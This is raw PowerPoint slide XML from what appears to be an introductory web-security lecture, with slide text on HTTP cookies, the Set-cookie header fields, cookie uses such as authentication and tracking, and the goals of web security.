          <a:xfrm>
            <a:off x="2743200" y="3429000"/>
            <a:ext cx="3581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endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20493" name="Rectangle 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6FF35D30-51B9-0B47-9D85-1E302AC810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0201" y="4884738"/>
            <a:ext cx="1128713" cy="838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Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buChar char="u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Char char="•"/>
              <a:defRPr kumimoji="1"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•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kumimoji="0" lang="en-US" altLang="en-US" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20494" name="AutoShape 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{94C3C422-8B86-AA4B-BC67-52A166336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00213" y="4984750"/>
            <a:ext cx="914400" cy="6096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Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buChar char="u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Char char="•"/>
              <a:defRPr kumimoji="1"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•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kumimoji="0" lang="en-US" altLang="en-US" sz="1800">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Browser</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20495" name="AutoShape 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{72400593-B803-9546-9AC1-5B9C062D8C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9200" y="5722938"/>
            <a:ext cx="1524000" cy="228600"/>
          </a:xfrm>
          <a:prstGeom prst="parallelogram">
            <a:avLst>
              <a:gd name="adj" fmla="val 1666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Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buChar char="u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Char char="•"/>
              <a:defRPr kumimoji="1"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•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kumimoji="0" lang="en-US" altLang="en-US" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20496" name="Rectangle 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DC0359A6-E0E2-F240-9ACA-F475B0C9BF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9200" y="5927725"/>
            <a:ext cx="1143000" cy="152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Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buChar char="u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Char char="•"/>
              <a:defRPr kumimoji="1"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•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kumimoji="0" lang="en-US" altLang="en-US" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20497" name="Freeform 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C39E76EE-229A-3543-BCC3-CF3BBC68BA6B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2343150" y="5694363"/>
            <a:ext cx="400050" cy="385762"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 252"/>
              <a:gd name="T1" fmla="*/ 2147483646 h 243"/>
              <a:gd name="T2" fmla="*/ 2147483646 w 252"/>
              <a:gd name="T3" fmla="*/ 2147483646 h 243"/>
              <a:gd name="T4" fmla="*/ 2147483646 w 252"/>
              <a:gd name="T5" fmla="*/ 0 h 243"/>
              <a:gd name="T6" fmla="*/ 0 w 252"/>
              <a:gd name="T7" fmla="*/ 2147483646 h 243"/>
              <a:gd name="T8" fmla="*/ 0 w 252"/>
              <a:gd name="T9" fmla="*/ 2147483646 h 24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52"/>
              <a:gd name="T16" fmla="*/ 0 h 243"/>
              <a:gd name="T17" fmla="*/ 252 w 252"/>
              <a:gd name="T18" fmla="*/ 243 h 24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52" h="243">
                <a:moveTo>
                  <a:pt x="0" y="243"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="252" y="81"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="249" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="147"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="243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sp>
        <p:nvSpPr>
          <p:cNvPr id="20498" name="AutoShape 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{18692C97-B05B-A345-9A55-7E8565DCD3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24600" y="4808539"/>
            <a:ext cx="1219200" cy="1271587"/>
          </a:xfrm>
          <a:prstGeom prst="can">
            <a:avLst>
              <a:gd name="adj" fmla="val 26074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Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buChar char="u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Char char="•"/>
              <a:defRPr kumimoji="1"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•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kumimoji="0" lang="en-US" altLang="en-US" sz="2400">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20499" name="Line 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9089A96D-4364-5F40-8BA8-3E5E4FEF3A17}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2743200" y="5257800"/>
            <a:ext cx="3581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endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20500" name="Text Box 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{361B91BB-2665-4B43-8CBC-85200B3136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9397" y="4857750"/>
            <a:ext cx="221567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Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buChar char="u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Char char="•"/>
              <a:defRPr kumimoji="1"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•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kumimoji="0" lang="en-US" altLang="en-US" sz="2000">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>GET restricted.html</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20501" name="Text Box 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3CB8487E-1B93-3046-A419-2EDE00F04D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77293" y="5257800"/>
            <a:ext cx="270351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Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buChar char="u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Char char="•"/>
              <a:defRPr kumimoji="1"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•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kumimoji="0" lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Cookie: NAME=VALUE</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20502" name="Text Box 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{651497E1-4A4C-8141-B358-4422EF5DFF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32459" y="2824232"/>
            <a:ext cx="3191851" cy="707886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Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buChar char="u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Char char="•"/>
              <a:defRPr kumimoji="1"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•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>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buFont typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>HTTP is a stateless protocol Cookies add state</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20504" name="Rectangle 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{48255877-8FF5-F54F-81CF-3B758C0E47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5600" y="3444876"/>
            <a:ext cx="4572000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Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buChar char="u"/>
              <a:tabLst>
                <a:tab pos="1371600" algn="l"/>
              </a:tabLst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Char char="•"/>
              <a:tabLst>
                <a:tab pos="1371600" algn="l"/>
              </a:tabLst>
              <a:defRPr kumimoji="1"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–"/>
              <a:tabLst>
                <a:tab pos="1371600" algn="l"/>
              </a:tabLst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•"/>
              <a:tabLst>
                <a:tab pos="1371600" algn="l"/>
              </a:tabLst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Char char="–"/>
              <a:tabLst>
                <a:tab pos="1371600" algn="l"/>
              </a:tabLst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tabLst>
                <a:tab pos="1371600" algn="l"/>
              </a:tabLst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tabLst>
                <a:tab pos="1371600" algn="l"/>
              </a:tabLst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tabLst>
                <a:tab pos="1371600" algn="l"/>
              </a:tabLst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tabLst>
                <a:tab pos="1371600" algn="l"/>
              </a:tabLst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kumimoji="0" lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>HTTP Header:</a:t>
            </a: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kumimoji="0" lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Set-cookie:	NAME=VALUE ;</a:t>
            </a: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kumimoji="0" lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>	domain = (who can read) ;</a:t>
            </a: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kumimoji="0" lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>	expires = (when expires) ;</a:t>
            </a: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kumimoji="0" lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>	secure = (send only over HTTPS)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20D07CB-15CC-D943-96A3-3DEBB4AEE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Website Can Store Info in Browser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2707DEE-0813-4242-8ACF-503EEE512E59}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4252684" y="6067797"/>
            <a:ext cx="64620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Browser attaches automatically when visiting a site that’s in scope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5150E8E-7DB6-0D43-9CC6-D09DC8E9A09C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3925080" y="5729880"/>
            <a:ext cx="411120" cy="495720"/>
            <a:chOff x="3925080" y="5729880"/>
            <a:chExt cx="411120" cy="495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4401C936-D79A-1B4C-9987-D4549538475C}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3925080" y="5729880"/>
                <a:ext cx="325800" cy="49572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4401C936-D79A-1B4C-9987-D4549538475C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907440" y="5711880"/>
                  <a:ext cx="361440" cy="53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5965BDB3-CB82-D44D-AE31-34D17A0DF166}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4080240" y="5754720"/>
                <a:ext cx="255960" cy="1087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5965BDB3-CB82-D44D-AE31-34D17A0DF166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062600" y="5736720"/>
                  <a:ext cx="291600" cy="144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C7FCB8E0-AF92-264C-BEE2-6E4466548BEA}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="9757800" y="6402360"/>
              <a:ext cx="775080" cy="2988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C7FCB8E0-AF92-264C-BEE2-6E4466548BE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748800" y="6393360"/>
                <a:ext cx="792720" cy="47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B917394E-AB93-1B49-9612-DB250E9AD235}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="10681200" y="5937600"/>
            <a:ext cx="148680" cy="330840"/>
            <a:chOff x="10681200" y="5937600"/>
            <a:chExt cx="148680" cy="33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D6D20002-43DD-FB41-8148-D920ACC8061B}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="10681200" y="5937600"/>
                <a:ext cx="146880" cy="2408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D6D20002-43DD-FB41-8148-D920ACC8061B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0672200" y="5928600"/>
                  <a:ext cx="16452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D76672C9-2D7A-6A40-8890-80455CD0ED5E}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="10825920" y="6264480"/>
                <a:ext cx="3960" cy="39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D76672C9-2D7A-6A40-8890-80455CD0ED5E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0816920" y="6255480"/>
                  <a:ext cx="21600" cy="216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551290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93" grpId="0" animBg="1"/>
      <p:bldP spid="20494" grpId="0" animBg="1"/>
      <p:bldP spid="20495" grpId="0" animBg="1"/>
      <p:bldP spid="20496" grpId="0" animBg="1"/>
      <p:bldP spid="20497" grpId="0" animBg="1"/>
      <p:bldP spid="20498" grpId="0" animBg="1"/>
      <p:bldP spid="20499" grpId="0" animBg="1"/>
      <p:bldP spid="20500" grpId="0"/>
      <p:bldP spid="20501" grpId="0"/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2" name="Rectangle 71">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F04BED5A-E98E-4DA0-BAA5-4F6AB2492D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EB64B94A-E40E-48CE-BD7B-C1A30AE572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3982" y="488542"/>
            <a:ext cx="11244036" cy="5880916"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom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49EC5CA6-6479-49D5-B4B5-5643D26B83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84442" y="2057401"/>
            <a:ext cx="0" cy="27432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 77">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D1B26337-5AA4-470D-9687-5907CB53B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685800"/>
            <a:ext cx="10853928" cy="5486400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="6350" cap="sq" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter lim="800000"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21506" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F0280806-8356-C74F-BD87-1982F1F3EAA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66440" y="1000370"/>
            <a:ext cx="3462079" cy="4857262"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>What Are Cookies Used For?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21507" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D21D956-2AC3-474F-BDF6-43FA56D5284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963691" y="1000370"/>
            <a:ext cx="5924045" cy="4857262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altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Proves to the website that the user of this browser previously authenticated correctly</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Personalization</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Helps the website recognize the user from a previous visit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Tracking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Follow the user from site to site; learn his/her browsing behavior, preferences, and so on</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25286416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F04BED5A-E98E-4DA0-BAA5-4F6AB2492D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EB64B94A-E40E-48CE-BD7B-C1A30AE572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3982" y="488542"/>
            <a:ext cx="11244036" cy="5880916"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom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49EC5CA6-6479-49D5-B4B5-5643D26B83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84442" y="2057401"/>
            <a:ext cx="0" cy="27432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Rectangle 76">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D1B26337-5AA4-470D-9687-5907CB53B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685800"/>
            <a:ext cx="10853928" cy="5486400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="6350" cap="sq" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter lim="800000"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22529" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{53F83B4F-9C02-E24E-AC12-31EF95E3526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66440" y="1000370"/>
            <a:ext cx="3462079" cy="4857262"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Goals of </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Web Security</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22530" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4F9A2164-6851-464B-B076-E58FA24700FD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963690" y="1000370"/>
            <a:ext cx="6361855" cy="4857262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altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Safely browse the Web</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>A malicious website cannot steal information from or modify legitimate sites or otherwise harm the user…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>… even if visited concurrently with a legitimate site -  in a separate browser window, tab, or even iframe on the same webpage</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Support secure Web applications</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Applications delivered over the Web should have the same security properties we require for standalone applications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A3A30C4-0293-774B-B9C4-87F90615713D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7102928" y="5449934"/>
            <a:ext cx="27927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What are these properties?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D9E145D-EA3D-5E48-9427-303804F034FE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7516337" y="5059234"/>
            <a:ext cx="321120" cy="411120"/>
            <a:chOff x="7516337" y="5059234"/>
            <a:chExt cx="321120" cy="411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5928B5AB-AF0E-4D49-A85E-BDA263281380}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7526417" y="5063914"/>
                <a:ext cx="311040" cy="40644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5928B5AB-AF0E-4D49-A85E-BDA263281380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508777" y="5046274"/>
                  <a:ext cx="346680" cy="44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5482B3BC-37A6-BC42-93C0-8C7596F1BECF}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7516337" y="5073994"/>
                <a:ext cx="11520" cy="13104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5482B3BC-37A6-BC42-93C0-8C7596F1BECF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498697" y="5055994"/>
                  <a:ext cx="4716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4305A773-C1CF-454A-A8F2-49B1FCEAB505}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7538297" y="5059234"/>
                <a:ext cx="148320" cy="334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4305A773-C1CF-454A-A8F2-49B1FCEAB505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520297" y="5041594"/>
                  <a:ext cx="183960" cy="691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212421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Custom 8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96A9A9"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="CB58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D0690C"/>
      </a:hlink>
      <a:folHlink>
        <a:srgbClr val="9696A0"/>
      </a:folHlink>
    </a:clrScheme>
    <a:fontScheme name="Savon">
      <a:majorFont>
        <a:latin typeface="Speak Pro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Selawik Light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VTI" id="{A72E8C35-66DD-49F8-AF66-813F19B983AE}" vid="{93CCBC76-B7A1-4C3D-93EA-5CE34C4670F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2765</TotalTime>
  <Words>4012</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>672</Paragraphs>
  <Slides>69</Slides>
  <Notes>11</Notes>
  <HiddenSlides>1</HiddenSlides>
  <MMClips>0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86" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Consolas</vt:lpstr>
      <vt:lpstr>Courier</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>Garamond</vt:lpstr>
      <vt:lpstr>Gill Sans</vt:lpstr>
      <vt:lpstr>Helvetica</vt:lpstr>
      <vt:lpstr>Lucida Console</vt:lpstr>
      <vt:lpstr>Monotype Sorts</vt:lpstr>
      <vt:lpstr>Segoe Print</vt:lpstr>
      <vt:lpstr>Selawik Light</vt:lpstr>
      <vt:lpstr>Speak Pro</vt:lpstr>
      <vt:lpstr>Tahoma</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
